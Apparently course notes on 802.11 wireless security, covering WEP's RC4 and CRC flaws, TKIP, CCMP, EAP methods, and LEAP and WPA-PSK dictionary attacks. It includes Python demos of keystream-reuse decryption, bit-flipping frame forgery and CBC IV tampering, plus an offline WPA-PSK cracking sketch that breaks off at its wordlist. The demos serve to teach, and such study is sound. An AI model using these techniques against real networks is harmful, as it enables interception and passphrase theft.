The 802.11 standard only describes the physical and the MAC layer. The physical layer is split into the PLCP and the PMD sublayers, while Medium Access Control takes over the layer 2 functions.
Each 802.11 layer takes over different tasks. The MAC layer is responsible for medium access and fragmentation. The PLCP part of the physical layer controls the CCA signal, and the PMD part handles data modulation and coding.
Clear Channel Assessment
CCA is an algorithm to determine if the channel is clear
But what is "clear"?
Medium access
Roaming
Authentication
Data services
Energy saving
Asynchronous data service
Polling method
Optional
"Distributed Foundation Wireless Medium Access Control" (DFWMAC)
DCF (CSMA/CA)
PCF
The 802.11 standard defines three access methods: a CSMA/CA-based method (must be supported), an optional method that avoids the problem of hidden (invisible) stations, and an optional, collision-free method. The first two methods make up the Distributed Coordination Function (DCF); the third is the so-called Point Coordination Function (PCF). DCF methods can only support asynchronous services, while PCF supports asynchronous and time-bounded services. However, an access point is necessary for PCF.
Note: The PCF is optional and only very few APs or Wi-Fi adapters actually implement it.
Superframe
Beacon is sent by "Point Coordinator" (PC=AP)
Minimum CP period guaranteed
To a max of 255
Post-backoff
To avoid "channel capture"
Exception: Long silent durations
Performed within CP
Hybrid Coordination Function (HCF)
Is an enhanced PCF
Radio broadcast
Reduce TX powers!
Physical jamming
[Figure: $C_1 \oplus C_2$ = 1 0 0 0 0 1 1 0 1 0 = $P_1 \oplus P_2$]
Although RC4 is a very good algorithm, its application in WEP reveals some remarkable security flaws. WEP is insecure when the same keystream is used more than once; the key length and the random properties of the keystream do not matter at all!
This is because the XOR operation eliminates two identical terms. That is, if an attacker sniffed ciphertext $C_1$ and ciphertext $C_2$, which had been produced by the same keystream $S$, then the WEP algorithm actually performed the following operations:
$C_1 = S \oplus P_1$ and $C_2 = S \oplus P_2$.
Hence $C_1 \oplus C_2$ cancels out $S$ and equals $P_1 \oplus P_2$. Thus, if plaintext $P_1$ is known, $P_2$ can be easily calculated!
Note: This attack method also works for a subset of these "vectors": if a part of $P_1$ is known, then the corresponding part of $P_2$ can be calculated.
Knowledge of parts of the plaintext message can enable statistical attacks to recover all plaintexts. These statistical attacks become increasingly practical as more ciphertexts that use the same keystream are known. Once one of the plaintexts becomes known, it is trivial to recover all of the others.
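A minimal sketch of the keystream-reuse attack, assuming a WEP-style RC4 key of IV || shared secret. The 40-bit key, the IV and both plaintexts are made-up values, and the ICV is omitted for brevity. Note that the key length plays no role: the attacker never touches the key.

```python
def rc4_keystream(key: bytes, n: int) -> bytes:
    """Return n bytes of RC4 keystream (key scheduling + pseudo-random generation)."""
    s = list(range(256))
    j = 0
    for i in range(256):  # key-scheduling algorithm (KSA)
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):  # pseudo-random generation algorithm (PRGA)
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) % 256])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    """Bytewise XOR, truncated to the shorter input."""
    return bytes(x ^ y for x, y in zip(a, b))


# WEP-style RC4 key: 24-bit IV followed by the shared secret (hypothetical values).
iv = bytes([0x01, 0x02, 0x03])          # the SAME IV is used for both packets
secret = bytes.fromhex("1122334455")    # 40-bit WEP key; a 104-bit key would not help
p1 = b"GET /index.html HTTP/1.0"        # plaintext the attacker can guess
p2 = b"user=alice&pass=s3cret"          # plaintext the attacker wants

ks = rc4_keystream(iv + secret, max(len(p1), len(p2)))
c1, c2 = xor(p1, ks), xor(p2, ks)       # both sniffed from the air

# The keystream cancels out: C1 xor C2 == P1 xor P2
recovered = xor(xor(c1, c2), p1)
print(recovered)  # b'user=alice&pass=s3cret'
```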
Although most 802.11 equipment is designed to disregard encrypted content for which it does not have the key, it is relatively simple to change the configuration of the drivers. Active attacks, which require transmission, seem to be more difficult, yet not impossible. Many 802.11 products come with programmable firmware, which has been reverse-engineered and modified to give attackers the ability to inject traffic.
IV Collisions
Keystream should change for each packet
$1500\ \text{byte} \times 2^{24} \approx 24$ GByte
Matter of hours only
Shared key length does not hamper the attack!
Because of the XOR properties it is crucial to continuously change the key that makes up the particular keystream, ideally for each packet sent! The key is made up of the shared secret and the IV, and the latter was intended to prevent keystream collisions. But actually, the standard does not specify how to change the IV. There is no strict requirement to change IVs at all!
Example of an attack duration:
A busy access point, which constantly sends 1500-byte packets at 11 Mbps, will exhaust the space of IVs after $1500 \cdot 8 / (11 \cdot 10^6) \cdot 2^{24} \approx 18{,}000$ seconds, or 5 hours. This allows an attacker to collect two ciphertexts that are encrypted with the same keystream and perform statistical attacks to recover the plaintext.
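The attack-duration estimate above can be reproduced with a few lines. This minimal sketch makes the same simplifying assumptions as the text (back-to-back 1500-byte packets at the full 11 Mbps, no MAC/PHY overhead); the function name is illustrative.

```python
def iv_exhaustion_seconds(packet_bytes: int, bitrate_bps: float, iv_bits: int = 24) -> float:
    """Time until every IV value has been used once.

    Assumes back-to-back packets at the full bit rate and ignores
    MAC/PHY overhead, exactly like the estimate in the text.
    """
    seconds_per_packet = packet_bytes * 8 / bitrate_bps
    return seconds_per_packet * 2 ** iv_bits


t = iv_exhaustion_seconds(1500, 11e6)
print(f"24-bit IV: {t:.0f} s = {t / 3600:.1f} h")

# For comparison: the 48-bit IV used by TKIP/CCMP under the same assumptions
years = iv_exhaustion_seconds(1500, 11e6, iv_bits=48) / (365 * 24 * 3600)
print(f"48-bit IV: about {years:.0f} years")
```

The first line gives about 18,300 s (roughly 5 h), matching the text; with a 48-bit IV the same traffic would need close to ten thousand years.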
Now it is clear that the shared key length does not affect this sort of attack at all (also see Jesse Walker's "Unsafe at any key length" paper). If $P_1$ is known, then $P_2$ is immediately available. Much network traffic contains predictable information, and the attack becomes much easier when three or more packets collide. Certain devices on the market use the IV in an easily predictable way, for instance by incrementing it by one for each packet. Furthermore, the IV value is reset at each startup.
One New York computer security consultant quoted in a Wall Street Journal article says he was able to access the computer network of his client, a major financial services firm on Wall Street, while sitting on a bench across the street.
Common wireless sniffing tools are WEPcrack and AirSnort.
Integrity Vulnerability
Encrypted CRC is used to check integrity
But CRC is linear:
$\mathrm{RC4}_K(\mathrm{CRC}(X \oplus Y)) = \mathrm{RC4}_K(\mathrm{CRC}(X)) \oplus \mathrm{CRC}(Y)$
Attacker can easily modify known bytes of packets (at least L3/L4 header structures are known)
[Figure: bit flipping in a WEP frame
  plaintext + CRC          011010010101 ... 0110
⊕ keystream                100110110010 ... 1100
= ciphertext               111100100111 ... 1010
⊕ manipulation frame       000010000000 ... 1001
= manipulated ciphertext   111110100111 ... 0011 (with correct CRC)]
Furthermore, WEP is also used to protect the integrity of a frame in combination with the CRC. But the CRC is a linear operation and can therefore be additively decomposed.
Because of this property, an attacker could XOR a plaintext $X$ with another plaintext $Y$ for manipulation purposes and only has to calculate $\mathrm{CRC}(X) \oplus \mathrm{CRC}(Y)$ to get $\mathrm{CRC}(X \oplus Y)$. Because of the linearity, this operation can also be applied successfully even when the CRC is RC4-encrypted!
Thus the integrity check does not prevent packet modification, and an attacker can easily flip bits in packets, modify active streams, or bypass access control. Even partial knowledge of the packet is sufficient if the attacker only wants to modify the known portion.
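A minimal sketch of the bit-flipping attack on an encrypted CRC-protected frame. Assumptions: random bytes stand in for the RC4 keystream, the ICV is CRC-32 appended little-endian, and the frame content is made up. One detail differs from the idealized formula above: the standard CRC-32 (with its preset register and final inversion) is affine rather than strictly linear, so the relation picks up a constant term, the CRC of an all-zero string of the same length. The attacker can compute that just as easily.

```python
import os
import zlib


def xor(a: bytes, b: bytes) -> bytes:
    """Bytewise XOR, truncated to the shorter input."""
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data: bytes) -> bytes:
    """WEP-style ICV: CRC-32 of the plaintext, appended as 4 little-endian bytes."""
    return zlib.crc32(data).to_bytes(4, "little")


# Sender: plaintext || ICV, XORed with the keystream (random bytes stand in for RC4).
plaintext = b"dst=10.0.0.5 port=80 amount=0100"
keystream = os.urandom(len(plaintext) + 4)
ciphertext = xor(plaintext + icv(plaintext), keystream)

# Attacker: knows the layout and the current "0100", wants "9100"; never sees the keystream.
delta = bytearray(len(plaintext))
delta[-4:] = xor(b"0100", b"9100")          # flip only the bits that differ
delta = bytes(delta)
# CRC-32 is affine: crc(x ^ d) == crc(x) ^ crc(d) ^ crc(zeros) for equal-length inputs
icv_delta = xor(icv(delta), icv(bytes(len(delta))))
forged = xor(ciphertext, delta + icv_delta)

# Receiver (e.g. the AP): decrypt and verify the ICV.
decrypted = xor(forged, keystream)
body, received_icv = decrypted[:-4], decrypted[-4:]
print(body, received_icv == icv(body))  # b'dst=10.0.0.5 port=80 amount=9100' True
```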
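Bit-Flipping Attack Example
Attacker catches and manipulates encrypted frame, updates ICV
AP decrypts frame, validates ICV and forwards frame
Router detects fault and sends predictable error message
Keystream = $C'' \oplus P''$
[Figure: the manipulated frame C' (plaintext P') passes the AP to the router; the router's predictable error message P'' comes back encrypted as C'']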
Arbaugh Attack
Allows an attacker to expand a known keystream of size n arbitrarily
Dictionary-building attacks
Nonlinear algorithm
Temporal Key Integrity Protocol (TKIP or "WEP2")
CCMP = AES + CBC-MAC
Hash-based mixer
[Figure: HASH(Base WEP Key, IV) = Packet Key, which seeds RC4 (together with the IV) to produce the key stream]
Because of urgent security demands of the market, Cisco developed a proprietary "Cisco KIP" (CKIP), which hashes the static WEP key together with the 24-bit IV to obtain the actual packet key.
Cisco's solution also provides per-packet keys, but WPA's TKIP is recommended because:
WPA's TKIP is computationally more efficient.
It is more secure, because of the PMK involved.
The dynamic RC4 key space is much bigger than with CKIP.
Nearly all important vendors support WPA.
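The idea of a hash-based packet-key mixer can be illustrated with a small sketch. It is hypothetical: SHA-256 merely stands in for the mixing function, and neither the actual CKIP nor the TKIP key-mixing algorithm is reproduced. It only shows the contrast with WEP, where the RC4 keys for consecutive IVs are identical except for the IV bytes, while a hashed packet key changes completely when the IV changes.

```python
import hashlib


def wep_packet_key(base_key: bytes, iv: int) -> bytes:
    """WEP: RC4 key = 24-bit IV || shared secret (IV byte order chosen for illustration)."""
    return iv.to_bytes(3, "big") + base_key


def mixed_packet_key(base_key: bytes, iv: int, key_len: int = 16) -> bytes:
    """HYPOTHETICAL hash-based mixer: SHA-256(base key || IV), truncated to key_len bytes.

    Not the real CKIP or TKIP key-mixing function; it only illustrates the idea.
    """
    return hashlib.sha256(base_key + iv.to_bytes(3, "big")).digest()[:key_len]


def differing_bytes(a: bytes, b: bytes) -> int:
    """Number of byte positions in which two equal-length keys differ."""
    return sum(x != y for x, y in zip(a, b))


base = bytes.fromhex("0102030405")  # hypothetical 40-bit base WEP key
print("WEP keys for IV 1 and 2 differ in",
      differing_bytes(wep_packet_key(base, 1), wep_packet_key(base, 2)), "byte(s)")
print("Mixed keys for IV 1 and 2 differ in",
      differing_bytes(mixed_packet_key(base, 1), mixed_packet_key(base, 2)), "byte(s)")
```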
Security
Contrary to rumors, TKIP is reasonably safe!
Nonlinear algorithm
Temporal Key Integrity Protocol (TKIP or "WEP2")
Also uses RC4-based WEP without the known flaws
Per-packet keys through IV mixing
Replay protection
CCMP = AES + CBC-MAC
Same IV is used
CBC is self-synchronizing
If an error (including loss of one or more entire blocks) occurs in block $c_j$ but not in $c_{j+1}$, then $c_{j+2}$ is correctly decrypted to $x_{j+2}$.
Although CBC mode decryption recovers from errors in ciphertext blocks, modifications to a plaintext block $x_j$ during encryption alter all subsequent ciphertext blocks. This limits the usability of chaining modes for applications requiring random read/write access to encrypted data.
An exposed IV might allow a man-in-the-middle (MITM) to change the IV value in transit. Changing the IV changes only the deciphered plaintext for the first block, without garbling the second block. Any or all bits of the first-block plaintext can be changed systematically with complete control.
The most obvious way to prevent deliberate MITM changes to the first-block plaintext via the IV is to encipher the IV; that prevents an opponent from changing plaintext bits systematically.
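Both CBC properties described above can be demonstrated in a minimal sketch. The Python standard library has no AES, so a toy 4-round Feistel cipher built from SHA-256 stands in for the block cipher; it is NOT secure and only shows that the chaining behavior does not depend on which block cipher is used. Key, IV and message blocks are made-up values.

```python
import hashlib
import os

BLOCK = 16  # block size in bytes, as for AES


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _round(key: bytes, rnd: int, half: bytes) -> bytes:
    """Feistel round function derived from SHA-256."""
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[: BLOCK // 2]


def toy_encrypt(key: bytes, block: bytes) -> bytes:
    """Toy 4-round Feistel block cipher. NOT secure; stands in for AES."""
    left, right = block[: BLOCK // 2], block[BLOCK // 2 :]
    for rnd in range(4):
        left, right = right, _xor(left, _round(key, rnd, right))
    return left + right


def toy_decrypt(key: bytes, block: bytes) -> bytes:
    """Inverse of toy_encrypt: run the rounds backwards."""
    left, right = block[: BLOCK // 2], block[BLOCK // 2 :]
    for rnd in reversed(range(4)):
        left, right = _xor(right, _round(key, rnd, left)), left
    return left + right


def cbc_encrypt(key: bytes, iv: bytes, blocks: list[bytes]) -> list[bytes]:
    out, prev = [], iv
    for p in blocks:
        prev = toy_encrypt(key, _xor(p, prev))  # c_j = E(x_j xor c_{j-1})
        out.append(prev)
    return out


def cbc_decrypt(key: bytes, iv: bytes, blocks: list[bytes]) -> list[bytes]:
    out, prev = [], iv
    for c in blocks:
        out.append(_xor(toy_decrypt(key, c), prev))  # x_j = D(c_j) xor c_{j-1}
        prev = c
    return out


key, iv = os.urandom(16), os.urandom(BLOCK)
plain = [b"PAY 0000100 EUR.", b"TO ACCOUNT 12345", b"MEMO: RENT FEB..", b"END OF MESSAGE.."]
cipher = cbc_encrypt(key, iv, plain)

# 1) Self-synchronization: corrupt one bit of c_1 (0-based index).
#    Only x_1 and x_2 are affected; x_3 = x_{j+2} decrypts correctly again.
damaged = list(cipher)
damaged[1] = _xor(damaged[1], b"\x01" + bytes(BLOCK - 1))
print([x == p for x, p in zip(cbc_decrypt(key, iv, damaged), plain)])  # [True, False, False, True]

# 2) IV manipulation: XOR the IV with a chosen difference to rewrite the first block only.
delta = _xor(b"PAY 0000100 EUR.", b"PAY 9000100 EUR.")
tampered = cbc_decrypt(key, _xor(iv, delta), cipher)
print(tampered[0], tampered[1:] == plain[1:])  # b'PAY 9000100 EUR.' True
```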
Counter Mode (CCM = Counter with CBC-MAC)
Instead of directly encrypting the data, only a counter is encrypted
The message is then XORed with this encrypted counter
Counter = nonce (SQNR, Source-MAC, Priority fields)
WPA2 supports FIPS 140-2 compliant security, basically AES in counter mode. (An early draft included AES-OCB instead, but it was dropped due to patent issues.) A 48-bit IV protects against replay attacks.
Authentication and integrity are maintained using an 8-byte CBC-MAC with a 48-bit nonce. Besides the data, the source and destination MAC addresses in the header are also protected by the CBC-MAC. (These fields are called Additional Authenticated Data, AAD.)
The CBC-MAC, the nonce, and an additional 2 bytes of IEEE 802.11 overhead make the CCMP packet 16 octets larger than an unencrypted IEEE 802.11 packet (8 + 6 + 2 = 16).
The AP advertises cipher suites both in beacons and probe responses.
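The counter-mode principle can be sketched as follows. Assumptions: HMAC-SHA256 truncated to 16 bytes stands in for AES (counter mode only ever uses the forward direction of the block cipher, so any keyed pseudo-random function shows the principle); the 13-byte nonce layout (priority, source MAC, 48-bit packet number) is assumed from the slide's "SQNR, Source-MAC, Priority"; the counter-block format is illustrative; and the CBC-MAC part is left out. This is not CCMP as specified.

```python
import hashlib
import hmac

BLOCK = 16


def prf_block(key: bytes, counter_block: bytes) -> bytes:
    """Stand-in for AES_K(counter block): HMAC-SHA256 truncated to 16 bytes."""
    return hmac.new(key, counter_block, hashlib.sha256).digest()[:BLOCK]


def make_nonce(priority: int, src_mac: str, packet_number: int) -> bytes:
    """Assumed 13-byte nonce: priority (1) || source MAC (6) || 48-bit packet number (6)."""
    mac = bytes.fromhex(src_mac.replace(":", ""))
    return bytes([priority]) + mac + packet_number.to_bytes(6, "big")


def ctr_crypt(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """Encrypt or decrypt: XOR data with E_K(nonce || i) for i = 1, 2, ... (illustrative layout)."""
    out = bytearray()
    for i in range(0, len(data), BLOCK):
        counter_block = nonce + (i // BLOCK + 1).to_bytes(3, "big")  # 13 + 3 = 16 bytes
        keystream = prf_block(key, counter_block)
        out += bytes(d ^ k for d, k in zip(data[i : i + BLOCK], keystream))
    return bytes(out)


key = bytes(range(16))  # hypothetical 128-bit temporal key
nonce = make_nonce(priority=0, src_mac="00:11:22:33:44:55", packet_number=1)
msg = b"Only the counter is encrypted, never the data itself."
ct = ctr_crypt(key, nonce, msg)
assert ctr_crypt(key, nonce, ct) == msg   # the same operation decrypts
assert len(ct) == len(msg)                 # no padding needed

# Per-packet overhead quoted in the text: 8-byte CBC-MAC + 6-byte (48-bit) nonce + 2 bytes
print("CCMP overhead:", 8 + 6 + 2, "octets")
```

Because encryption and decryption are the same XOR operation, a (key, nonce) pair must never be reused, for the same reason that reused WEP keystreams are fatal; this is why the packet number in the nonce is incremented for every frame.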
Offset Code Book (OCB)
Patented
Combines authentication and encryption
Slightly faster than CBC encryption
LEAP performs unencrypted MSCHAPv2 (challenge-handshake)
Asleap captures challenge and encrypted reply and performs an offline dictionary attack
Written by Joshua Wright
http://asleap.sourceforge.net/
Also see Leapcrack
[Figure: Example: Asleap cracking the password "test"]
A good policy should require a password length of at least 12 characters, including numbers, mixed case, and punctuation. It should also require that passwords be based neither on words found in any dictionary nor on any variant of the username.
There are cracking dictionaries for hundreds of languages and commonly used words, such as names of places, people, and movies. Usually the only way to enforce strong passwords is with tools that enforce them at creation time. Users are good at choosing easy-to-remember passwords and tend to ignore unenforced rules. It is a good idea to run regular, automated password cracking against your organization's passwords and warn users or disable accounts with bad passwords. Your organizational environment determines what strength of password enforcement and frequency of password changes is acceptable to your user community.
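The policy above can be enforced at creation time with a check like the following minimal sketch. The tiny word list and the username-variant test (case-insensitive containment of the username or its reversal) are simplifying assumptions; a real deployment would check against a large cracking dictionary.

```python
import string


def check_password(password: str, username: str, dictionary: set[str]) -> list[str]:
    """Return the list of policy violations; an empty list means the password is acceptable."""
    problems = []
    if len(password) < 12:
        problems.append("shorter than 12 characters")
    if not any(c.isdigit() for c in password):
        problems.append("no digit")
    if not (any(c.islower() for c in password) and any(c.isupper() for c in password)):
        problems.append("no mixed case")
    if not any(c in string.punctuation for c in password):
        problems.append("no punctuation")
    lowered = password.lower()
    # Simplification: flag any (lowercase) dictionary word of 4+ letters contained in the password.
    if any(word in lowered for word in dictionary if len(word) >= 4):
        problems.append("contains a dictionary word")
    user = username.lower()
    # Simplification: treat the username and its reversal as "variants".
    if user and (user in lowered or user[::-1] in lowered):
        problems.append("based on the username")
    return problems


words = {"test", "password", "dragon", "summer"}  # tiny stand-in for a cracking dictionary
print(check_password("test", "jdoe", words))
print(check_password("Summer2010!jdoe", "jdoe", words))  # ['contains a dictionary word', 'based on the username']
print(check_password("v7#Qr!p2Lx9&", "jdoe", words))     # []
```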
802.1x - EAP-TTLS
Created by Funk and Certicom (Internet draft)
EAP method 21
Widely implemented, also Linux support; but no Cisco support
Supports ANY inner authentication method
Any EAP method
As well as older methods such as CHAP, PAP, MS-CHAP and MS-CHAPv2
Basic idea:
[Figure: the outer EAP carries EAP-TTLS; a TLS tunnel built with server certificates protects AVPs that carry PAP, CHAP, MSCHAP, MSCHAPv2, ...]
EAP-TTLS was developed by Funk Software and Certicom, and was first supported by Agere Systems, Proxim, and Avaya. Today EAP-TTLS is being considered by the IETF as a new standard.
The structures of Tunneled TLS (TTLS) and PEAP are quite similar. Both are two-stage protocols that establish security in stage one and then exchange authentication in stage two.
Stage one of both protocols establishes a TLS tunnel and authenticates the authentication server to the client with a certificate. Once that secure channel has been established, client authentication credentials are exchanged in the second stage.
802.1x - EAP-TTLS
RADIUS-like AVPs between client and server
Client certificate not required, but the user has two identities:
1. An anonymous identity such as "anonymous@example.com" and
2. The real identity, which is only sent encrypted, such as "user342@example.com".
Client identity protected by TLS
Fast session reconnect (but too slow for VoIP)
Detailed:
[Figure: protocol stack: PAP, CHAP, MSCHAP, MSCHAPv2 over AVPs over TLS over EAP over Ethernet or RADIUS]
Unlike PEAP, EAP-TTLS supports any authentication method, not only EAP methods. Therefore, there is no inner EAP session; instead, RADIUS-like AVPs carry the authentication data.
EAP-TTLS often uses PAP (also with Linux).
As with PEAP, user identity information is protected.
802.1x - Other EAP Choices
More than 44 EAP types already defined
...
EAP-FAST: Successor of LEAP
See dedicated section
PEAP-EAP-TLS
Another Microsoft solution similar to EAP-TLS
There are other EAP methods which are currently not so important in the 802.11
WLAN world.
EAP-AKA works similarly to LEAP. AKA stands for Authentication and Key Agreement. It is also used with HTTP Authentication and GSM. See draft-arkko-pppext-eap-aka-12.txt for details.
EAP-MD5 does not support mutual authentication and is not strong enough, although some vendors use it with WLAN devices.
EAP-GTC is typically only used as the inner EAP method of PEAP. In this case it is often called "PEAP-GTC".
EAP-SIM is used by 3GPP applications (GSM and UMTS). SIM stands for Subscriber Identity Module.
EAP-SRP (Secure Remote Password) is a method used by some vendors, mainly Orinoco.
WPA note: EAP-MD5, EAP-GTC, EAP-OTP, and EAP-MSCHAPv2 cannot be used alone with WPA. They can only be used as inner authentication algorithms with EAP-PEAP and EAP-TTLS.
Microsoft supports another form of PEAPv0 (which Microsoft calls PEAP-EAP-TLS) that Cisco and other third-party server and client software don't support. PEAP-EAP-TLS requires a client-side digital certificate located on the client's hard drive or, more securely, on a smartcard. PEAP-EAP-TLS is very similar in operation to the original EAP-TLS but provides slightly more protection, because portions of the client certificate that are unencrypted in EAP-TLS are encrypted in PEAP-EAP-TLS.
Since few third-party clients and servers support PEAP-EAP-TLS, users should probably avoid it unless they only intend to use Microsoft desktop clients and servers.
EAP Types Overview
1-6 Assigned by RFC
1 Identity
2 Notification
3 Nak (response only)
4 MD5-Challenge
5 One-Time Password (OTP)
6 Generic Token Card (GTC)
7-8 Not assigned
9 RSA Public Key Authentication
10 DSS Unilateral
11 KEA
12 KEA-VALIDATE
13 EAP-TLS
14 Defender Token (AXENT)
15 RSA Security SecurID EAP
16 Arcot Systems EAP
17 EAP-Cisco Wireless (LEAP)
18 Nokia IP SmartCard authentication
19 SRP-SHA1 Part 1
20 SRP-SHA1 Part 2
21 EAP-TTLS
22 Remote Access Service
23 UMTS Authentication and Key Agreement
24 EAP-3Com Wireless
25 PEAP
26 MS-EAP-Authentication
27 Mutual Authentication w/Key Exchange (MAKE)
28 CRYPTOCard
29 EAP-MSCHAP-V2
30 DynamID
31 Rob EAP
32 SecurID EAP
33 EAP-TLV
34 SentriNET
35 EAP-Actiontec Wireless
36 Cogent Systems Biometrics Authentication EAP
37 AirFortress EAP
38 EAP-HTTP Digest
39 SecureSuite EAP
40 DeviceConnect EAP
41 EAP-SPEKE
42 EAP-MOBAC
43 EAP-FAST
44-191 Not assigned; can be assigned by IANA on the advice of a designated expert
192-253 Reserved; requires standards action
254 Expanded types
255 Experimental usage
This list is just for reference.
PEAP
802.1x using PEAP
Created by Cisco and Microsoft
Similar to EAP-TTLS
Open standard
EAP method 25
Since third EAP message is always in clear
Latest draft
E.g. DH-based
If certificates are sent by the server
Computationally lightweight
Symmetric cryptography is used
Key concept:
Also TLS-protected inner EAP authentication
But PACs instead of X.509 certificates
[Figure: EAP-FAST layering: inner EAP or other method, carried by the TLV encapsulation protocol inside TLS, inside EAP-FAST and EAP, over a carrier protocol (EAPoL, RADIUS, Diameter, ...)]
EAP-FAST has been designed by Cisco and can be considered the successor of LEAP. Unlike LEAP, EAP-FAST is an IETF draft (see draft-cam-winget-eap-fast-01.txt).
Client support has been available since Q4/2004. The main goals of the EAP-FAST design are:
- Strong authentication and session key provisioning similar to PEAP or EAP-TTLS
- Simple deployment without the use of a PKI
- Fast roaming support in order to allow for VoIP applications (WDS integration)
- Computationally lightweight by using symmetric cryptography
EAP-FAST uses so-called Protected Access Credentials (PACs) instead of certificates. The protocol must facilitate the use of a single strong shared secret by the peer while enabling the servers to minimize the per-user and per-device state they must cache and manage.
PACs
First, Protected Access Credentials (PACs) are generated by the authentication server and distributed to the clients
Similar AP settings
EAP-TTLS/MSCHAPv2
PEAPv0/EAP-MSCHAPv2
PEAPv1/EAP-GTC
EAP-SIM
Native OS support
Nonces
The alternative to server-based keys (SBKs). In WPA-PSK, users must share a passphrase that may be from eight to 63 ASCII characters or 64 hexadecimal digits (256 bits). Each character in the passphrase must have an encoding in the range of 32 to 126 (decimal), inclusive (IEEE Std. 802.11i-2004, Annex H.4.1). The space character is included in this range.
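The passphrase rules quoted from Annex H.4.1 translate directly into a format check. A minimal sketch; the function name is hypothetical.

```python
import string


def is_valid_wpa_psk(secret: str) -> bool:
    """Check the WPA-PSK secret format described above.

    Accepts either 64 hexadecimal digits (a raw 256-bit key) or a passphrase
    of 8 to 63 characters, each with a code in the range 32..126 (space included).
    """
    if len(secret) == 64 and all(c in string.hexdigits for c in secret):
        return True
    return 8 <= len(secret) <= 63 and all(32 <= ord(c) <= 126 for c in secret)


for candidate in ["short", "correct horse battery staple", "a" * 64, "g" * 64, "pass\tword123"]:
    print(repr(candidate[:20]), is_valid_wpa_psk(candidate))
```

Note that 64 characters are only accepted when all of them are hex digits, and a control character such as a tab falls outside the allowed range.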
In November 2003, Robert Moskowitz, a senior technical director at ICSA Labs (part of TruSecure), released "Weakness in Passphrase Choice in WPA Interface". In this paper, Moskowitz described a straightforward formula that would reveal the passphrase by performing a dictionary attack against WPA-PSK networks. This weakness is based on the fact that the pairwise master key (PMK) is derived only from the passphrase, the SSID and the length of the SSID: this information is hashed 4,096 times to generate a 256-bit value, which is then combined with the nonce values exchanged in the handshake. The information required to create and verify the session key is broadcast with normal traffic and is readily obtainable; the challenge then becomes the reconstruction of the original values. Moskowitz explains that the pairwise transient key (PTK) is a keyed-HMAC function based on the PMK; by capturing the four-way authentication handshake, the attacker has the data required to subject the passphrase to a dictionary attack.
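The PMK computation described above is PBKDF2 with HMAC-SHA1, the SSID as salt, 4,096 iterations and a 256-bit output, and Python's `hashlib` provides it directly. A minimal sketch (the function name is illustrative). The nonces do not enter at this step; they are mixed in only when the PTK is derived from the PMK during the four-way handshake.

```python
import hashlib


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 32 bytes = 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"), ssid.encode("utf-8"), 4096, 32)


pmk = wpa_pmk("password", "IEEE")
print(pmk.hex())
```

The passphrase "password" with SSID "IEEE" appears among the passphrase-to-PSK test vectors in Annex H of IEEE 802.11i, so the printed value can be checked against the standard.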
WPA-PSK (2)
2003: Robert Moskowitz published an effective dictionary attack against WPA-PSK
Passphrase should be more than 20 characters!!!
Attack Tools: coWPAtty, KisMAC, WPA Cracker, ...
According to Moskowitz, "a key generated from a passphrase of less than about 20 characters is unlikely to deter attacks." In late 2004, Takehiro Takahashi, then a student at Georgia Tech, released WPA Cracker.
Around the same time, Josh Wright, a network engineer and well-known security lecturer, released coWPAtty. Both tools are written for Linux systems and perform a brute-force dictionary attack against WPA-PSK networks in an attempt to determine the shared passphrase. Both require the user to supply a dictionary file and a dump file that contains the WPA-PSK four-way handshake. Both function similarly; however, coWPAtty contains an automatic parser, while WPA Cracker requires the user to perform a manual string extraction.
Additionally, coWPAtty has optimized the HMAC-SHA1 function and is somewhat faster. Each tool uses the PBKDF2 (Password-Based Key Derivation Function) algorithm that governs PSK hashing to attack and determine the passphrase. Neither is extremely fast or effective against longer passphrases, though, as each must perform 4,096 HMAC-SHA1 iterations with the values described in the Moskowitz paper.
PBKDF2 is a key derivation function that is part of RSA Laboratories' Public-Key Cryptography Standards (PKCS) series, specifically PKCS #5 v2.0, also published as the Internet Engineering Task Force's RFC 2898. It replaces an earlier standard, PBKDF1, which could only produce derived keys up to 160 bits long.
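The offline attack performed by tools such as coWPAtty and WPA Cracker can be sketched as below. Assumptions: the "captured" handshake is simulated (random nonces, made-up MAC addresses and a dummy EAPOL frame instead of a parsed capture file), the MIC is computed WPA2-style as HMAC-SHA1 truncated to 16 bytes, and the PTK expansion follows the 802.11i PRF construction. Real tools parse the actual EAPOL frames; this only shows why every candidate costs a full 4,096-iteration PBKDF2 run and why no further contact with the network is needed.

```python
import hashlib
import hmac
import os


def pmk(passphrase: bytes, ssid: bytes) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 32 bytes): the expensive step per guess."""
    return hashlib.pbkdf2_hmac("sha1", passphrase, ssid, 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i-style PRF: concatenate HMAC-SHA1(key, label || 0x00 || data || counter)."""
    out, counter = b"", 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:nbytes]


def handshake_mic(pmk_: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes, eapol: bytes) -> bytes:
    """Derive the PTK from PMK, MAC addresses and nonces, then MIC the EAPOL frame with the KCK."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    ptk = prf(pmk_, b"Pairwise key expansion", data, 64)
    kck = ptk[:16]  # key confirmation key protects the handshake MIC
    return hmac.new(kck, eapol, hashlib.sha1).digest()[:16]


# --- Simulated capture (all values hypothetical) ---
ssid = b"HomeNet"
aa, spa = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
anonce, snonce = os.urandom(32), os.urandom(32)
eapol = b"dummy EAPOL-Key frame with MIC field zeroed"
captured_mic = handshake_mic(pmk(b"sunshine1", ssid), aa, spa, anonce, snonce, eapol)

# --- Offline dictionary attack: everything needed was sniffed from the air ---
wordlist = [b"password", b"letmein!", b"sunshine1", b"qwerty123"]
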